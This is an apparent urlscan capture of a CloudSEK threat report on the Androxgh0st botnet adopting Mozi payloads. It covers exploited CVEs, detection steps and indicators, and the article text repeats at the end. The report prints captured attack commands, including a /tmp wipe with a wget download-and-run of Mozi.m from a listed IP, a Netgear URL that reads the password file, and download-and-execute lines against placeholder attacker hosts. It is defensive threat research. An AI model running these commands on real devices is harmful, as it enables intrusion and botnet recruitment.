www.cloudsek.com
Open in
urlscan Pro
172.67.72.49
Public Scan
URL:
https://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave
Submission: On November 11 via api from IN — Scanned from CA
Submission: On November 11 via api from IN — Scanned from CA
Form analysis
1 forms found in the DOMName: email-form — GET
<form id="email-form" name="email-form" data-name="Email Form" method="get" class="form-v" data-wf-page-id="643d86bee5710968d7e506fa" data-wf-element-id="2ea9d89e-b6c8-5dfa-9484-0f34ae39de82" aria-label="Email Form">
<div class="form-wrap"><input class="text-field-2 w-input" maxlength="256" name="Email-Form-Career" data-name="Email Form Career" placeholder="Enter your email" type="email" id="Email-Form-Career"><input type="submit" data-wait="Please wait..."
class="button-primary-l-2 w-button" value="Get started"></div><label class="w-checkbox checkbox-field-2">
<div class="w-checkbox-input w-checkbox-input--inputType-custom checkbox-2"></div><input type="checkbox" id="checkbox" name="checkbox" data-name="Checkbox" style="opacity:0;position:absolute;z-index:-1"><span class="checkbox-label-2 w-form-label"
for="checkbox">I agree with <a href="#" class="text-link">Terms and Condition</a></span>
</label>
</form>
Text Content
We value your privacy We use cookies to enhance your browsing experience, serve personalized ads or content, and analyze our traffic. By clicking "Accept All", you consent to our use of cookies. Customize Reject All Accept All Customize Consent Preferences We use cookies to help you navigate efficiently and perform certain functions. You will find detailed information about all cookies under each consent category below. The cookies that are categorized as "Necessary" are stored on your browser as they are essential for enabling the basic functionalities of the site. ... Show more NecessaryAlways Active Necessary cookies are required to enable the basic features of this site, such as providing secure log-in or adjusting your consent preferences. These cookies do not store any personally identifiable data. * Cookie AWSALBCORS * Duration 7 days * Description Amazon Web Services set this cookie for load balancing. * Cookie __cfruid * Duration session * Description Cloudflare sets this cookie to identify trusted web traffic. * Cookie __cf_bm * Duration 1 hour * Description This cookie, set by Cloudflare, is used to support Cloudflare Bot Management. * Cookie _GRECAPTCHA * Duration 6 months * Description Google Recaptcha service sets this cookie to identify bots to protect the website against malicious spam attacks. * Cookie JSESSIONID * Duration session * Description New Relic uses this cookie to store a session identifier so that New Relic can monitor session counts for an application. Functional Functional cookies help perform certain functionalities like sharing the content of the website on social media platforms, collecting feedback, and other third-party features. * Cookie li_gc * Duration 6 months * Description Linkedin set this cookie for storing visitor's consent regarding using cookies for non-essential purposes. * Cookie lidc * Duration 1 day * Description LinkedIn sets the lidc cookie to facilitate data center selection. * Cookie UserMatchHistory * Duration 1 month * Description LinkedIn sets this cookie for LinkedIn Ads ID syncing. * Cookie lang * Duration session * Description LinkedIn sets this cookie to remember a user's language setting. Analytics Analytical cookies are used to understand how visitors interact with the website. These cookies help provide information on metrics such as the number of visitors, bounce rate, traffic source, etc. * Cookie CLID * Duration 1 year * Description Microsoft Clarity set this cookie to store information about how visitors interact with the website. The cookie helps to provide an analysis report. The data collection includes the number of visitors, where they visit the website, and the pages visited. * Cookie _ga_* * Duration 1 year 1 month 4 days * Description Google Analytics sets this cookie to store and count page views. * Cookie _ga * Duration 1 year 1 month 4 days * Description Google Analytics sets this cookie to calculate visitor, session and campaign data and track site usage for the site's analytics report. The cookie stores information anonymously and assigns a randomly generated number to recognise unique visitors. * Cookie _gid * Duration 1 day * Description Google Analytics sets this cookie to store information on how visitors use a website while also creating an analytics report of the website's performance. Some of the collected data includes the number of visitors, their source, and the pages they visit anonymously. * Cookie _gcl_au * Duration 3 months * Description Google Tag Manager sets the cookie to experiment advertisement efficiency of websites using their services. * Cookie _gat_UA-* * Duration 1 minute * Description Google Analytics sets this cookie for user behaviour tracking. * Cookie _clck * Duration 1 year * Description Microsoft Clarity sets this cookie to retain the browser's Clarity User ID and settings exclusive to that website. This guarantees that actions taken during subsequent visits to the same website will be linked to the same user ID. * Cookie _gat_gtag_UA_* * Duration 1 minute * Description Google Analytics sets this cookie to store a unique user ID. * Cookie _clsk * Duration 1 day * Description Microsoft Clarity sets this cookie to store and consolidate a user's pageviews into a single session recording. * Cookie MR * Duration 7 days * Description This cookie, set by Bing, is used to collect user information for analytics purposes. * Cookie SM * Duration session * Description Microsoft Clarity cookie set this cookie for synchronizing the MUID across Microsoft domains. * Cookie AnalyticsSyncHistory * Duration 1 month * Description Linkedin set this cookie to store information about the time a sync took place with the lms_analytics cookie. * Cookie rxVisitor * Duration session * Description This cookie is set by the provider Dynatrace. This cookie is used to store the visitor ID for the returning visitors. Performance Performance cookies are used to understand and analyze the key performance indexes of the website which helps in delivering a better user experience for the visitors. * Cookie SRM_B * Duration 1 year 24 days * Description Used by Microsoft Advertising as a unique ID for visitors. * Cookie AWSALB * Duration 7 days * Description AWSALB is an application load balancer cookie set by Amazon Web Services to map the session to the target. * Cookie rxvt * Duration session * Description This cookie is set by the provider Dynatrace. This is a session cookie used to store two timestamps. Advertisement Advertisement cookies are used to provide visitors with customized advertisements based on the pages you visited previously and to analyze the effectiveness of the ad campaigns. * Cookie _rdt_uuid * Duration 3 months * Description Reddit sets this cookie to build a profile of your interests and show you relevant ads. * Cookie bcookie * Duration 1 year * Description LinkedIn sets this cookie from LinkedIn share buttons and ad tags to recognize browser IDs. * Cookie li_sugr * Duration 3 months * Description LinkedIn sets this cookie to collect user behaviour data to optimise the website and make advertisements on the website more relevant. * Cookie MUID * Duration 1 year 24 days * Description Bing sets this cookie to recognise unique web browsers visiting Microsoft sites. This cookie is used for advertising, site analytics, and other operations. * Cookie ANONCHK * Duration 10 minutes * Description The ANONCHK cookie, set by Bing, is used to store a user's session ID and verify ads' clicks on the Bing search engine. The cookie helps in reporting and personalization as well. * Cookie bscookie * Duration 1 year * Description LinkedIn sets this cookie to store performed actions on the website. Uncategorized Other uncategorized cookies are those that are being analyzed and have not been classified into a category as yet. * Cookie AWSALBTGCORS * Duration 7 days * Description No description available. * Cookie AWSALBTG * Duration 7 days * Description No description available. * Cookie _cfuvid * Duration session * Description Description is currently not available. * Cookie li_alerts * Duration 1 year * Description Description is currently not available. Reject All Save My Preferences Accept All Powered by Home Product CloudSEK XVigil External Digital Risk Protection CloudSEK BeVigil Enterprise Attack Surface Monitoring CloudSEK SVigil Software and Supply chain Risk Monitoring and Protection CloudSEK BeVigil Community Application Scanner CloudSEK Exposure Check if your organisation's data is in a data breach Solutions Cyber Threats Monitoring Dark web monitoring Brand Threats Monitoring Infrastructure Monitoring Partner Secret Scanning BeVigil Jenkins CI BeVigil OSINT CLI BeVigil Asset Explorer Resources RESOURCES Blog The latest industry news, updates and info. Threat Intelligence Get up and running on new threat reports and techniques. Knowledge Base Basics of Cybersecurity and see more definitions Whitepapers & Reports The content team broke their backs making these reports. Customer stories Learn how our customers are making big changes. You have got good company! COMPANY Integrations We are more connected than you know. Explore all Integrations Partners 100s of partners and one Shared goal; Secure future for all us. About us Learn about our story and our mission statement. Life at CloudSEK A sneak peek at the awesome life at CloudSEK. Careers We're hiring! We are in love with undeniable talent. Join our team! Legal All the boring but necessary legalese that legal made us add. RESOURCES BLOG POSTS Mozi Resurfaces as Androxgh0st Botnet: Unraveling The Latest Exploitation Wave Read Now All Blog Posts WHITEPAPERS & REPORTS Beyond the Storefront: E-commerce and Retail Threat Insights Read the Report now! All Reports Log in Schedule a Demo Vulnerability Intelligence 16 mins read MOZI RESURFACES AS ANDROXGH0ST BOTNET: UNRAVELING THE LATEST EXPLOITATION WAVE The report by CloudSEK uncovers the resurgence of the Mozi botnet in a new form called "Androxgh0st," actively exploiting vulnerabilities across multiple platforms, including IoT devices and web servers. Since January 2024, Androxgh0st has adopted payloads and tactics from Mozi, allowing it to target systems like Cisco ASA, Atlassian JIRA, and PHP frameworks. This botnet utilizes remote code execution and credential-stealing methods to maintain persistent access, leveraging unpatched vulnerabilities to infiltrate critical infrastructures. Immediate security patches and regular monitoring are advised to mitigate risks from this complex threat, which now combines Mozi’s IoT-targeting abilities with Androxgh0st’s extended attack vector. CloudSEK TRIAD November 6, 2024 Last Update posted on November 7, 2024 Schedule a Demo Table of Contents * Text Link * Text Link * * Executive Summary * Analysis and Impact * Vulnerabilities Exploited by Androxgh0st Botnet * Global Infection Statistics * Check for signs of compromise * Threat Actor Activity and Rating * References * Appendix Author(s) No items found. EXECUTIVE SUMMARY CloudSEK’s Threat Research team has identified significant developments in the Androxgh0st botnet, revealing its exploitation of multiple vulnerabilities and a potential operational integration with the Mozi botnet. Active since January 2024, Androxgh0st is known for targeting web servers, but recent command and control (C2) logs indicate it is also deploying IoT-focused Mozi payloads. CISA released an advisory on the botnet earlier this year. The botnet, active since January 2024, targets a broad range of technologies, including Cisco ASA, Atlassian JIRA, and various PHP frameworks, allowing unauthorized access and remote code execution. This clearly outlines the heightened activity from the botnet operators, as they are now focusing on a wide range of web application vulnerabilities in order to obtain initial access, in addition to the 3 CVEs reported earlier by CISA. CloudSEK recommends immediate patching of these vulnerabilities to mitigate risks associated with the Androxgh0st botnet, which is known for systematic exploitation and persistent backdoor access. ANALYSIS AND IMPACT BACKGROUND * CloudSEK’s contextual AI digital risk platform XVigil discovered that the Androxgh0st botnet has been exploiting CVE-2023-1389 and CVE-2024-36401 since at least August 2024. * CISA released a security advisory in Jan 2024, raising awareness about the expansion of the Androxgh0st botnet using the 3 initial access vectors listed below: 1. Exploiting PHP Vulnerability (CVE-2017-9841) in PHPUnit: Threat actors exploit a vulnerability in the PHPUnit framework by targeting exposed /vendor folders, specifically using the eval-stdin.php page to execute PHP code remotely and upload malicious files, establishing backdoor access to compromised websites. 2. Targeting Laravel Framework’s .env and Application Key (CVE-2018-15133): Androxgh0st scans for websites with exposed Laravel .env files to steal credentials. If the application key is accessible, it enables encrypted PHP code execution through XSRF tokens, allowing file uploads and remote access. 3. Apache Web Server Path Traversal (CVE-2021-41773): By targeting Apache versions 2.4.49 and 2.4.50, threat actors use path traversal to access files outside the root directory, exploiting improperly configured servers to run arbitrary code and potentially gain sensitive data or credentials. 4. ABOUT MOZI BOTNET The Mozi botnet primarily spanned across China, India and Albania. The botnet targeted Netgear, Dasan, D-Link routers and MVPower DVR Jaws servers. In 2021, the authors of the Mozi botnet were arrested by the Chinese law enforcement. The Mozi botnet creators, or Chinese law enforcement, by forcing the cooperation of the creators - distributed an update which killed Mozi Botnet Agents’ ability to connect to the outside world, leaving only a small fraction of working bots standing. During our investigation, we were able to acquire the command and control server logs of Androxgh0st botnet. Our analysis sheds light on the vulnerabilities being exploited by the botnet, and the common TTPs with Mozi. ANALYSIS * During our routine scans for malicious infrastructure hunting, CloudSEK’s TRIAD found command and control servers being used by the Androxgh0st botnet. Hunting for malicious infrastructure - found misconfigured Logger and Command Sender panels * As we can see, the servers are storing the POST and GET requests from the botnet agent over time. Hunting for malicious infrastructure - found misconfigured Logger and Command Sender panels * Androxgh0st botnet is known to send POST requests containing a number of peculiar strings. Matching Androxgh0st Botnet related strings Now that we have confirmed that these servers are communicating with the botnet agents, let us take a look at the type of web requests logged on these servers, in order to understand the web application vulnerabilities exploited by the botnet. VULNERABILITIES EXPLOITED BY ANDROXGH0ST BOTNET CloudSEK’s TRIAD has revealed an array of vulnerabilities being exploited by the Androxgh0st botnet to obtain initial access. Affected Product Impact Cisco ASA (up to 8.4.7/9.1.4) Arbitrary web script injection or HTML via an unspecified parameter. Atlassian JIRA (before version 8.5.14, from version 8.6.0 before 8.13.6, and from version 8.14.0 before 8.16.1.) Allows remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint. Metabase GeoJSON Versions x.40.0-x.40.4 An unauthenticated, remote attacker can exploit this, via a specially crafted HTTP GET request, to download arbitrary files with root privileges and examine environment variables. Sophos Firewall version v18.5 MR3 and older A remote, unauthenticated attacker can execute arbitrary code remotely. Oracle EBS versions 12.2.3 through to 12.2.11 Unauthenticated Arbitrary File Upload OptiLink ONT1GEW GPON 2.1.11_X101 Build 1127.190306 Authenticated Remote Code Execution PHP CGI (PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8) Allows an attacker to escape the command line and pass arguments to be interpreted directly by PHP. TP-Link Archer AX21 Allows unauthenticated command execution as root via the country parameter in /cgi-bin/luci;stok=/locale. Wordpress Plugin Background Image Cropper v1.2 Remote Code Execution Netgear DGN devices (Netgear DGN1000, firmware version < 1.1.00.48, Netgear DGN2200 v1) Unauthenticated Command Execution with root privileges GPON Home Routers Unauthenticated Command Execution 1. Cisco ASA WebVPN Login Page XSS Vulnerability (CVE-2014-2120): Cross-site scripting (XSS) vulnerability in the WebVPN login page in Cisco Adaptive Security Appliance (ASA) Software allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter. Exploitation attempts - CVE-2014-2120 Exploitation attempts - CVE-2014-2120 File Upload Form: * The code initially creates an HTML form that allows a file to be uploaded (<input type='file' name='a'>). * When a file is uploaded, it is saved to the server with its original filename using the PHP function move_uploaded_file(), allowing the attacker to upload arbitrary files to the server. Appends Code to PHP Files: * If the URL contains a bak parameter, a second script is activated. This script looks in the current directory for any files with a .php extension. * For each .php file, it appends the contents of a variable from the POST request ($_POST['file']) to the file. This essentially allows the attacker to insert arbitrary PHP code into any PHP file in the directory. This appending method can be used to spread malicious code across multiple PHP files on the server, establishing a more persistent presence or further backdooring the application. Limited Remote File Read in Jira Software Server (CVE-2021-26086): This vulnerability allows remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint. The affected versions are before version 8.5.14, from version 8.6.0 before 8.13.6, and from version 8.14.0 before 8.16.1. Exploitation attempts - CVE-2021-26086 Metabase GeoJSON map local file inclusion Versions x.40.0-x.40.4(CVE-2021-41277): A local file inclusion vulnerability exists in Metabase due to a security issue present in GeoJSON map support that leads to a local file inclusion vulnerability. An unauthenticated, remote attacker can exploit this, via a specially crafted HTTP GET request, to download arbitrary files with root privileges and examine environment variables. Exploitation attempts - CVE-2021-41277 * Sophos Authentication bypass vulnerability leads to RCE(CVE-2022-1040): An authentication bypass issue affecting the firewall’s User Portal and Webadmin web interfaces. The bypass allows a remote, unauthenticated attacker to execute arbitrary code. Exploitation attempts - CVE-2022-1040 Oracle E-Business Suite (EBS) Unauthenticated Arbitrary File Upload (CVE-2022-21587): An unauthenticated arbitrary file upload vulnerability in Oracle Web Applications Desktop Integrator, as shipped with Oracle EBS versions 12.2.3 through to 12.2.11, can be exploited in order to gain remote code execution as the oracle user. Exploitation attempts - CVE-2022-21587 OptiLink ONT1GEW GPON 2.1.11_X101 Build 1127.190306 - Remote Code Execution (Authenticated): Exploitation attempts - OptiLink Authenticated RCE PHP CGI argument Injection: (CVE-2024-4577): An argument injection issue in PHP-CGI. Exploitation attempts - CVE-2024-4577 TP-Link Unauthenticated Command Injection (CVE-2023-1389): An 8.8 CVSS-rated command injection flaw in TP-Link Archer AX21 firmware allows unauthenticated command execution as root via the country parameter in /cgi-bin/luci;stok=/locale. Exploitation attempts - CVE-2023-1389 * The .sh file downloaded using the RCE is what facilitates the exploit. * It downloads files from a remote server, makes them executable, executes them with the argument 'selfrep', and then deletes the downloaded files. This process is repeated for multiple files with different names. * The script downloads and executes files from the remote server at http://154.216.17[.]31. It is evident that it attempts to download and execute executables ('tarm', 'tarm5', 'tarm6', 'tarm7', 'tmips', 'tmpsl', 'tsh4', 'tspc', 'tppc', 'tarc'). The downloaded files are made executable and executed with the argument 'selfrep'. After execution, the downloaded files are deleted. * It uses the command '/bin/busybox' to execute commands. This suggests that the script is likely running on a system with a busybox environment, which confirms the usage against TP-Link routers. GeoServer RCE Vulnerability(CVE-2024-36401): Versions of GeoServer prior to 2.25.1, 2.24.3, and 2.23.5 allow unauthenticated remote code execution by mishandling OGC request parameters, permitting unsafe evaluation of XPath expressions. Exploitation attempts - CVE-2024-36401 WordPress Plugin Background Image Cropper v1.2 - Remote Code Execution: Exploitation attempts - WordPress Plugin Background Image Cropper RCE Wordpress Bruteforce Attacks: The botnet cycles through common administrative usernames and uses a consistent password pattern.The target URL redirects to /wp-admin/, which is the backend administration dashboard for WordPress sites. If the authentication is successful, it gains access to critical website controls and settings. Wordpress Bruteforce Attack on Admin Panel Unauthenticated Command Execution on Netgear DGN devices: The embedded web server skips authentication checks for some URLs containing the "currentsetting.htm" substring. As an example, the following URL can be accessed even by unauthenticated attackers:http://<target-ip-address>/setup.cgi?currentsetting.htm=1.Then, the "setup.cgi" page can be abused to execute arbitrary commands. As an example, to read the /www/.htpasswd local file (containing the clear-text password for the "admin" user), an attacker can access the following URL: http://<target-ip-address>/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/¤tsetting.htm=1 An attacker can replace the command with the command they want to run. Now, upon looking at the command and control server logs, we noticed a GET request that was exploiting this old vulnerability. We can also see what the injected commands are. Netgear Router Exploitation by Mozi Botnet Injected Commands: cmd=rm -rf /tmp/*; wget http://200.124.241[.]140:44999/Mozi.m -O /tmp/netgear; sh netgear The command sequence is as follows: * rm -rf /tmp/*: This deletes all files in the /tmp directory, to clear any old data and ensure enough storage for the downloaded malware. * wget http://200.124.241[.]140:44999/Mozi.m -O /tmp/netgear: This uses wget to download a malicious file named Mozi.m from an external server (200.124.241[.]140:44999) and saves it as /tmp/netgear. * sh netgear: This runs the downloaded file as a shell script. Mozi.m likely contains malicious code. Once executed, the target device becomes part of the botnet. The downloaded file, Mozi.m, is associated with the Mozi botnet. Mozi is a known botnet that primarily targets IoT devices by exploiting vulnerabilities to add them to a network of compromised devices. Unauthenticated Command Execution on GPON routers(CVE-2018-10561, CVE-2018-10562): CVE-2018-10561: Dasan GPON home routers allow authentication bypass by appending ?images to URLs that typically require login, such as /menu.html?images/ or /GponForm/diag_FORM?images/, enabling unauthorized device access. CVE-2018-10562: Dasan GPON routers are vulnerable to command injection via the dest_host parameter in a diag_action=ping request to the /GponForm/diag_Form URI. The router stores ping results in /tmp, which can be accessed by revisiting /diag.html, allowing commands to be executed and their output retrieved. GPON Router Exploitation by Mozi Botnet Possibilities: Mozi Payload as a Component of Androxgh0st: * It’s possible that Androxgh0st has fully integrated Mozi’s payload as a module within its own botnet architecture. In this case, Androxgh0st is not just collaborating with Mozi but embedding Mozi’s specific functionalities (e.g., IoT infection & propagation mechanisms) into its standard set of operations. * This would mean that Androxgh0st has expanded to leverage Mozi’s propagation power to infect more IoT devices, using Mozi’s payloads to accomplish goals that otherwise would require separate infection routines. Unified Command Infrastructure: * If both botnets are using the same command infrastructure, it points to a high level of operational integration, possibly implying that both Androxgh0st and Mozi are under the control of the same cybercriminal group. This shared infrastructure would streamline control over a broader range of devices, enhancing both the effectiveness and efficiency of their combined botnet operations. TRIAD recommends that organizations patch these vulnerabilities being exploited in the wild as soon as possible to reduce the probability of being compromised by the Androxgh0st/Mozi Botnet. Similarities in TTPs: TTP Example - Mozi Example - Androxgh0st Command Injection and same paths /setup.cgi?cmd=wget+http://[attacker_url]/Mozi.m+-O+/tmp/netgear;sh+netgear /cgi-bin/admin.cgi?command=ping&ip=127.0.0.1;wget+http://[attacker_url]/androx.sh+-O+/tmp/androx;sh+/tmp/androx File Inclusion /admin.cgi?file=../../../../../etc/passwd /config.cgi?file=../../../../../etc/shadow Exploitation of Admin Panels using bruteforce POST /login.cgi log=admin&pwd=admin123 POST /wp-login.php log=admin&pwd=Passnext%40123456 Payload Download and Execution wget http://[attacker_url]/mozi_arm; chmod +x mozi_arm; ./mozi_arm & curl http://[attacker_url]/androx_arm -o /tmp/androx_arm; chmod +x /tmp/androx_arm; /tmp/androx_arm Both botnets share infection tactics involving command injection, credential stuffing, file inclusion, and exploitation of IoT-focused CVEs. GLOBAL INFECTION STATISTICS The number of affected devices by the Androxgh0st botnet is increasing by the day. At the time of writing this blog, over 500 devices have been infected. Bots by country CHECK FOR SIGNS OF COMPROMISE 1. REVIEW HTTP AND WEB SERVER LOGS * Check for Suspicious Requests: Look for HTTP GET or POST requests that include unusual or suspicious commands, such as wget, curl, or command injection parameters like cmd=rm or cmd=wget. These are common signs of attempted command injection by Androxgh0st. Example log entries to watch for: GET /cgi-bin/admin.cgi?command=ping&ip=127.0.0.1;wget+http://[attacker_url]/androx.sh+-O+/tmp/androx;sh+/tmp/androx POST /wp-login.php HTTP/1.1 log=admin&pwd=Passnext%40123456 * Check for Unusual Login Attempts: Look for repeated failed login attempts, indicating brute-force activity on login pages such as /wp-login.php, /admin_login, or /cgi-bin/login.cgi. These may target default credentials or weak passwords . 2. MONITOR SYSTEM PROCESSES FOR UNEXPECTED ACTIVITY * Identify Suspicious Processes: Use commands like ps aux or top to look for unexpected processes running from unusual locations (e.g., /tmp, /var/tmp, or /dev/shm), which is typical of botnet payloads. Androxgh0st may execute commands such as: /tmp/androx * Inspect Crontab Entries and Startup Scripts: Androxgh0st often attempts persistence by modifying crontab files or startup scripts. Use the following commands to check for any suspicious entries: crontab -l cat /etc/rc.local cat /etc/cron.d/* 3. EXAMINE SUSPICIOUS FILES IN TEMPORARY DIRECTORIES * Inspect /tmp, /var/tmp, and /dev/shm Directories: Androxgh0st payloads and scripts are often downloaded and executed from these directories. Look for files with unusual names or recent changes in these locations: ls -la /tmp ls -la /var/tmp * Check File Permissions and Executable Files: Files in these directories should not typically be executable. Use find to locate executable files in these directories: find /tmp -type f -perm /111 4. ANALYZE NETWORK CONNECTIONS AND TRAFFIC * Monitor Outbound Connections to Known Malicious IPs or Domains: Androxgh0st may establish connections to its command-and-control (C2) server. Use tools like netstat or ss to identify active network connections: netstat -antp | grep ESTABLISHED * Look for unusual outbound connections on uncommon ports (e.g., high-numbered ports) or to external IPs that you don’t recognize. * Check for Excessive or Unusual Traffic Patterns: Androxgh0st-infected devices may exhibit unusual traffic, particularly if they are participating in a botnet. Monitor traffic for signs of:some text * Repeated DNS lookups for suspicious domains. * High volumes of outbound traffic that may indicate participation in DDoS activities. 5. REVIEW SECURITY CONFIGURATIONS FOR CHANGES * Check for Unexpected Changes to Firewall and Router Settings: Androxgh0st may attempt to open additional ports or modify firewall rules. Review firewall rules and router settings for unexpected modifications. * Inspect SSH Configuration for Weaknesses or Unauthorized Keys: If Androxgh0st used SSH brute-forcing to gain access, verify that no new SSH keys have been added to ~/.ssh/authorized_keys. Check: cat ~/.ssh/authorized_keys 6. SCAN FOR KNOWN VULNERABILITIES AND APPLY PATCHES * Identify Vulnerable Services and Applications: Androxgh0st often exploits known vulnerabilities in web servers, routers, and IoT devices. Use continuous attack surface scanners to detect any unpatched services or applications. * Update Firmware and Software Regularly: Ensure that all devices, particularly IoT devices and routers, are running the latest firmware versions, as Androxgh0st targets unpatched CVEs. 7. USE ENDPOINT DETECTION TOOLS * Run Endpoint Detection and Response (EDR) Software: EDR tools can help identify unusual behaviors, unauthorized processes, and suspicious files that may indicate Androxgh0st infection. * Conduct a File Integrity Check: Use tools that can detect changes to critical system files, startup configurations, or web server files. 8. CHECK LOGS FOR SIGNS OF PERSISTENCE MECHANISMS * Look for Modified Configuration Files: Review configuration files for any injected commands that would re-enable the botnet upon reboot. This includes files such as /etc/rc.local, .bashrc, or any custom startup scripts. * Audit System Logs for Malicious Activity Patterns: Look for patterns in auth.log, syslog, or application logs that may indicate Androxgh0st’s activity, including unexpected root login attempts or commands executed by web server user accounts. THREAT ACTOR ACTIVITY AND RATING Threat Actor Profiling Active since January 2024 Reputation HIGH Current Status ACTIVE History Androxgh0st remains actively deployed in the wild, even after the Mozi killswitch activation. It scans for vulnerable infrastructure, and has now expanded its targets from just Laravel and Apache servers, to a wide technology stack including but not limited to network gateway devices and WordPress. * Known for exploiting well-documented vulnerabilities (e.g., CVE-2017-9841 in PHPUnit and CVE-2021-41773 in Apache HTTP Server) to establish control over web servers. * Uses a botnet for systematic exploitation, scanning, and persistent access via file uploads and backdoors. * Has exploited a wide range of vulnerabilities across different software (e.g., Jira, Metabase, Sophos) to expand its control and facilitate remote code execution (RCE). Rating HIGH REFERENCES * *Intelligence source and information reliability - Wikipedia * #Traffic Light Protocol - Wikipedia * Other sources APPENDIX INDICATORS Request Logger and Command Sender - Androxgh0st * 165.22.184[.]66 * 45.55.104[.]59 * Api[.]next[.]eventsrealm[.]com (Eventsrealm is a Jamaica-based events aggregator platform) TP Link Router Exploitation - Download servers * 45.202.35[.]24 * 154.216.17[.]31 Netgear Router Exploitation - Download server * 200.124.241[.]140 GPON Router Exploitation - Download server * 117.215.206[.]216 File Hashes - Androxgh0st TP-Link Exploitation (md5) * 2403a89ab4ffec6d864ac0a7a225e99a * d9553ca3d837f261f8dfda9950978a0a * c8340927faaf9dccabb84a849f448e92 * a2021755d4d55c39ada0b4abc0c8bcf5 * c8340927faaf9dccabb84a849f448e92 * db2a59a1fd789d62858dfc4f436822d7 * dd5e7a153bebb8270cf0e7ce53e05d9c * f75061ac31f8b67ddcd5644f9570e29b * 45b5c4bff7499603a37d5a665b5b4ca3 * 6f8a79918c78280aec401778564e3345 * e3e6926fdee074adaa48b4627644fccb * abab0da6685a8eb739027aee4a5c4eaa * 2938986310675fa79e01af965f4ace4f * a6609478016c84aa235cd8b3047223eb * 3cb30d37cdfe949ac1ff3e33705f09e3 * 0564f83ada149b63a8928ff7591389f3 * 3d48dfd97f2b77417410500606b2ced6 AUTHOR CloudSEK TRIAD CloudSEK Threat Research and Information Analytics Division PREDICT CYBER THREATS AGAINST YOUR ORGANIZATION Schedule a Demo Related Posts No items found. JOIN 10,000+ SUBSCRIBERS Keep up with the latest news about strains of Malware, Phishing Lures, Indicators of Compromise, and Data Leaks. Take action now SECURE YOUR ORGANISATION WITH OUR AWARD WINNING PRODUCTS CloudSEK Platform is a no-code platform that powers our products with predictive threat analytic capabilities. Digital Risk Protection platform which gives Initial Attack Vector Protection for employees and customers. Learn more about XVigil Software and Supply chain Monitoring providing Initial Attack Vector Protection for Software Supply Chain risks. Learn more about SVigil Creates a blueprint of an organization's external attack surface including the core infrastructure and the software components. Learn more about BeVigil Ent Instant Security Score for any Android Mobile App on your phone. Search for any app to get an instant risk score. Learn more about BeVigil Join our newsletter We’ll send you a nice letter once per week. No spam. Product XVigil BeVigil SVigil New Tutorials Pricing Releases Company About us Careers Press News Media kit Contact Resources Blog Newsletter Events Help centre Tutorials Support Use Cases Startups Enterprise Government SaaS Marketplaces Ecommerce Social Twitter LinkedIn Facebook GitHub AngelList Dribbble © 2077 Untitled UI PrivacyGDPRDisclosure of Vulnerability Products XVigil BeVigil Enterprise SVigil BeVigil CloudSEK Exposure Mobile App Solutions Cyber Threats Monitoring Dark Web Monitoring Brand Threat Monitoring Infra Threat Monitoring Partners Secret Scanning BeVigil Jenkins CI BeVigil OSINT CLI BeVigil Asset Explorer Takedowns Resources Blogs and Articles Threat Intelligence Whitepapers and Reports Knowledge Base Integrations Community Discord Community CloudSEK News CloudSEK Community Company About us Customers Partners Life at CloudSEK Secure Sips Careers Announcements Press Contact Us At CloudSEK, we combine the power of Cyber Intelligence, Brand Monitoring, Attack Surface Monitoring, Infrastructure Monitoring and Supply Chain Intelligence to give context to our customers’ digital risks. GDPR Policy Privacy Vulnerability Disclosure Subscribe our newsletter I agree with Terms and Condition Thank you! Your submission has been received! Oops! Something went wrong while submitting the form. Vulnerability Intelligence 16 min read MOZI RESURFACES AS ANDROXGH0ST BOTNET: UNRAVELING THE LATEST EXPLOITATION WAVE The report by CloudSEK uncovers the resurgence of the Mozi botnet in a new form called "Androxgh0st," actively exploiting vulnerabilities across multiple platforms, including IoT devices and web servers. Since January 2024, Androxgh0st has adopted payloads and tactics from Mozi, allowing it to target systems like Cisco ASA, Atlassian JIRA, and PHP frameworks. This botnet utilizes remote code execution and credential-stealing methods to maintain persistent access, leveraging unpatched vulnerabilities to infiltrate critical infrastructures. Immediate security patches and regular monitoring are advised to mitigate risks from this complex threat, which now combines Mozi’s IoT-targeting abilities with Androxgh0st’s extended attack vector. Authors CloudSEK TRIAD CloudSEK Threat Research and Information Analytics Division Co-Authors No items found. EXECUTIVE SUMMARY CloudSEK’s Threat Research team has identified significant developments in the Androxgh0st botnet, revealing its exploitation of multiple vulnerabilities and a potential operational integration with the Mozi botnet. Active since January 2024, Androxgh0st is known for targeting web servers, but recent command and control (C2) logs indicate it is also deploying IoT-focused Mozi payloads. CISA released an advisory on the botnet earlier this year. The botnet, active since January 2024, targets a broad range of technologies, including Cisco ASA, Atlassian JIRA, and various PHP frameworks, allowing unauthorized access and remote code execution. This clearly outlines the heightened activity from the botnet operators, as they are now focusing on a wide range of web application vulnerabilities in order to obtain initial access, in addition to the 3 CVEs reported earlier by CISA. CloudSEK recommends immediate patching of these vulnerabilities to mitigate risks associated with the Androxgh0st botnet, which is known for systematic exploitation and persistent backdoor access. ANALYSIS AND IMPACT BACKGROUND * CloudSEK’s contextual AI digital risk platform XVigil discovered that the Androxgh0st botnet has been exploiting CVE-2023-1389 and CVE-2024-36401 since at least August 2024. * CISA released a security advisory in Jan 2024, raising awareness about the expansion of the Androxgh0st botnet using the 3 initial access vectors listed below: 1. Exploiting PHP Vulnerability (CVE-2017-9841) in PHPUnit: Threat actors exploit a vulnerability in the PHPUnit framework by targeting exposed /vendor folders, specifically using the eval-stdin.php page to execute PHP code remotely and upload malicious files, establishing backdoor access to compromised websites. 2. Targeting Laravel Framework’s .env and Application Key (CVE-2018-15133): Androxgh0st scans for websites with exposed Laravel .env files to steal credentials. If the application key is accessible, it enables encrypted PHP code execution through XSRF tokens, allowing file uploads and remote access. 3. Apache Web Server Path Traversal (CVE-2021-41773): By targeting Apache versions 2.4.49 and 2.4.50, threat actors use path traversal to access files outside the root directory, exploiting improperly configured servers to run arbitrary code and potentially gain sensitive data or credentials. 4. ABOUT MOZI BOTNET The Mozi botnet primarily spanned across China, India and Albania. The botnet targeted Netgear, Dasan, D-Link routers and MVPower DVR Jaws servers. In 2021, the authors of the Mozi botnet were arrested by the Chinese law enforcement. The Mozi botnet creators, or Chinese law enforcement, by forcing the cooperation of the creators - distributed an update which killed Mozi Botnet Agents’ ability to connect 